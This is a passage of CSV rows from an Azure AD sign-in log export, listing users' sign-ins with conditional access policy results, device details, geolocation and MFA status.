[], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:39,"{'operatingSystem': 'Windows 10', 'deviceId': '0cebce86-423b-4a2f-955c-e6f89cda22d4', 'browser': 'Edge 18.1836', 'displayName': 'YURIDBVT01', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",996684c9-a975-4c3e-bc3a-0cbe9fe94f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -97.2160873413086, 'latitude': 32.938751220703125}, 'state': 'Texas', 'city': 'Keller'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Yuri Diogenes,7bba727f-8e48-4ccd-a32f-8ca257705c35,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,996684c9-a975-4c3e-bc3a-0cbe9fe94f00,SigninLogs,Sucess,32.93875122,-97.21608734
+1325,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:50.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,74976d24-2dc9-48a3-b655-9abc11490018,Microsoft.aadiam,Microsoft.aadiam,,Yuri Diogenes,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:39,"{'operatingSystem': 'Windows 10', 'deviceId': '0cebce86-423b-4a2f-955c-e6f89cda22d4', 'browser': 'Edge 18.1836', 'displayName': 'YURIDBVT01', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",7e530b77-842f-4666-b292-698fe41a3e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -97.2160873413086, 'latitude': 32.938751220703125}, 'state': 'Texas', 'city': 'Keller'}",none,none,none,none,[],{'errorCode': 0},Yuri Diogenes,7bba727f-8e48-4ccd-a32f-8ca257705c35,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,7e530b77-842f-4666-b292-698fe41a3e00,SigninLogs,Sucess,32.93875122,-97.21608734
+1326,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:06.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c9763235-3cdd-4360-8c12-43c9f841f430,Microsoft.aadiam,Microsoft.aadiam,,Katie Anderson,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:38,"{'operatingSystem': 'Windows 10', 'deviceId': '625a07a7-ef86-4c2e-adda-0a8d8f285cb7', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-2QNVSP4', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",e3458dbf-9c16-47a0-884d-be6322463e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -73.98007202148438, 'latitude': 40.77373123168945}, 'state': 'New York', 'city': 'New York'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim provided by external provider'}",Katie Anderson,52751c51-455a-4181-94de-579f12776b02,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e3458dbf-9c16-47a0-884d-be6322463e00,SigninLogs,Sucess,40.77373123,-73.98007202
+1327,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,41:29.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,deccc428-3fda-4bc3-ba19-f0967fea0563,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:41,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 18.1836', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",61a47a2b-187e-4a1d-b943-278ff5b63d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,61a47a2b-187e-4a1d-b943-278ff5b63d00,SigninLogs,Sucess,35.01296997,-80.93171692
+1328,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:47.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",db9d2eaf-e3fe-45a9-85f6-9ccab5ea0a00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,db9d2eaf-e3fe-45a9-85f6-9ccab5ea0a00,SigninLogs,Sucess,33.0175209,35.44601059
+1329,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:48.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,894d9eac-c56b-43b3-98e2-4612a20a89ad,Microsoft.aadiam,Microsoft.aadiam,,Yuri Diogenes,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:39,"{'operatingSystem': 'Windows 10', 'deviceId': '0cebce86-423b-4a2f-955c-e6f89cda22d4', 'browser': 'Edge 18.1836', 'displayName': 'YURIDBVT01', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",996684c9-a975-4c3e-bc3a-0cbe9fe94f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -97.2160873413086, 'latitude': 32.938751220703125}, 'state': 'Texas', 'city': 'Keller'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Yuri Diogenes,7bba727f-8e48-4ccd-a32f-8ca257705c35,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,996684c9-a975-4c3e-bc3a-0cbe9fe94f00,SigninLogs,Sucess,32.93875122,-97.21608734
+1330,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,37:26.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,dea3e331-4f84-45c5-bcda-91dcb804662d,Microsoft.aadiam,Microsoft.aadiam,,Lori Chaconas,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:37,"{'operatingSystem': 'Windows 10', 'deviceId': '3587ac6d-3b32-4895-bfa9-72dd03d38cb6', 'browser': 'Chrome 80.0.3987', 'displayName': 'LCFLAGLER12', 'trustType': 'Azure AD registered', 'isCompliant': True, 'isManaged': True}",4b3528ee-92e3-408c-b8b8-e47b3dfa1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -81.21395111083984, 'latitude': 29.480300903320312}, 'state': 'Florida', 'city': 'Palm Coast'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Lori Chaconas,f0bc9cf3-99bd-47bd-a8d9-b9a3d2a8e647,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,4b3528ee-92e3-408c-b8b8-e47b3dfa1300,SigninLogs,Sucess,29.4803009,-81.21395111
+1331,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,42:36.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9c03e93a-1c51-4e1f-8762-bec6602670af,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,ACOM Azure Website,23523755-3a2b-41ca-9315-f81f3f566a95,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 12:42,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",717b2614-8bf5-4739-9b58-3ba3bfc81200,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,717b2614-8bf5-4739-9b58-3ba3bfc81200,SigninLogs,Sucess,50.6406517,5.572050095
+1332,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,41:29.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,deccc428-3fda-4bc3-ba19-f0967fea0563,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, 